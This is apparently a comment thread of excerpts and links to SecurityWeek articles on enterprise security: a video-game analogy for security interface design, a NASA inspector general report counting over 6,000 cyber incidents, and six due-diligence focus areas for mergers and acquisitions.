The enterprise security world is complex and confusing where we want to believe in the possibility of clean linear solutions for asymmetrical problems. Learning from past history and our current challenges should be enough of a lesson in the failure of security processes and products not delivering in their attempts to make the day-to-day routine of security professional lives easier. Each year we see more vendors with technology solutions and buzzwords that rarely live up to their hype and customers willing to believe or gamble for the chance at more visibility, lower business risk, or the chance to close a security gap.
What Cybersecurity Can Learn From Video Games (Part II)
https://www.securityweek.com/what-cybersecurity-can-learn-video-games-part-ii
By taking some lessons from outside our cybersecurity sandbox, we can address some of the significant challenges in cybersecurity
Cybersecurity is hard. There are no easy solutions, and in my previous column, I presented a thesis that we should lift our head out of the metaphorical cybersecurity sandbox to look at other business verticals for opportunities where cybersecurity could bring in principles and solutions with similar problem sets. I focused on interface usability and design principles focused on the human layer of cybersecurity, zeroing in specifically on comparing real-time strategy (RTS) video games to what we do every day in cybersecurity. It might help to check out the list of similarities and differences I created as they’re compelling and an exciting part of the story.
Tomi Engdahl says:
NASA Identified Over 6,000 Cyber Incidents in Past 4 Years
https://www.securityweek.com/nasa-identified-over-6000-cyber-incidents-past-4-years
The U.S. National Aeronautics and Space Administration (NASA) identified more than 6,000 cyber-related incidents in the last four years, according to a report published this month by NASA’s Office of Inspector General.
NASA has institutional systems, which are used for the day-to-day work of employees — these include data centers, web services, computers and networks. It also has mission systems, which support its aeronautics, space exploration and science programs — these include systems used for controlling spacecraft and processing scientific data.
The agency has more than 4,400 applications, over 15,000 mobile devices, roughly 13,000 software licenses, nearly 50,000 computers, and a whopping 39,000 Tb of data.
The audit conducted by NASA’s inspector general has revealed that while attacks on the agency’s networks are not uncommon, “attempts to steal critical information are increasing in both complexity and severity,” and the agency’s ability to detect, prevent and mitigate attacks is limited.
Tomi Engdahl says:
Why Evaluating Cybersecurity Prior to Mergers and Acquisitions is Necessary
https://www.securityweek.com/why-evaluating-cybersecurity-prior-mergers-and-acquisitions-necessary
Timely response and proactive investigation can help lessen the potential negative impact poor cyber hygiene can have on a business acquisition
Given the rise in third party breaches, including successful wide-scale attacks against major technology providers such as Solarwinds and Microsoft, Third Party Risk Management (TPRM) is becoming a critical concern for security teams responsible for the secure integration of third party systems and infrastructure during mergers and acquisitions.
Here are 6 focus areas M&A firms should evaluate in their due diligence process:
1. Security Engineering and Operations Management: Work that requires a dedicated security team is too often managed by IT. Many organizations have only a single IT manager with a small cross functional team. In the best cases, companies have an accompanying MSSP or MDR vendor, but that still doesn’t guarantee the level of security necessary to mitigate investment risks.
2. Vulnerability Management: Many organizations still lack an effective vulnerability management capability and seemingly struggle with asset inventory, configuration and release management, and timely patch management. The absence of these fundamental practices creates an expanded attack surface and one that is increasingly leveraged by advanced threat actors and should be viewed with caution. Learning what vulnerabilities exist before you acquire can help you identify the type of investment necessary in bolstering protections should a purchase go through.
3. Endpoint Security Management: An effective endpoint security management solution must match the sophistication of threats targeting a business. End user systems and devices are a primary access vector utilized by attackers for initial access into corporate networks. Insufficient visibility and security controls at the endpoint can ultimately lead to widespread internal compromise of critical systems and adversary access to sensitive data. Remote and dispersed workforces increase the threat of compromise via endpoint systems and devices.
4. Network and Data Access Management: Effective network and data access management is a challenge for companies small and large, increasingly so with geographic expansion and today’s remote workforces. Legacy network architectures still plague many organizations. Coupled with the lack of reliable segmentation and consistent access controls restricting access to network shares and repositories, these companies needlessly expose themselves to increased risk. Sensitive data, systems, and infrastructure create an expanded internal attack surface.
5. Incident Response Management: Organizations often lack incident response management capabilities and struggle with integrating emerging technologies, enhanced monitoring, and the establishment of playbooks and processes. An organization’s maturity and experience with incident response management often serves as a good litmus test for the general security posture and its ability to respond to current and future threats.
6. Adversary Emulation: Adversary emulation assessments and red teams are great tools for testing security controls and evaluating existing threat detection capabilities. Due to resource constraints, small and medium sized businesses tend to rely on external vendors with inconsistent results. Those same resource constraints translate into undone, incomplete, or sporadic reassessments, which leaves mitigation and remediation findings on the paper they were written on and no further.
While cyber due diligence has yet to become commonplace in M&A transactions, the consequences of failing to identify risks and active campaigns can have costly implications.
https://www.securityweek.com/yahoo-slashes-price-verizon-deal-350-million-after-data-breaches